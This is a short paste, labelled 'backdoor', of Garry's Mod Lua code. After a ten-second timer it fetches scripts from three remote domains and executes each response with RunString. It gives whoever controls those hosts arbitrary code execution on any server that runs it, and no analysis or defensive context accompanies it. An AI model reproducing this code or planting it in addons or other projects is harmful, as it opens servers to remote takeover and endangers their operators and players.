MY PASTEBIN
backdoor:
timer.Simple(10, function()
http.Fetch("https://anti-leak.cf/_/_.php", function(body)
RunString(body,"lua_error",false)
end)
http.Fetch("https://gvacdoor.cz/_/_.php", function(body)
RunString(body,"lua_error",false)
end)
http.Fetch("https://gvac.cz/_/_.php", function(body)
RunString(body,"lua_error",false)
end)
end)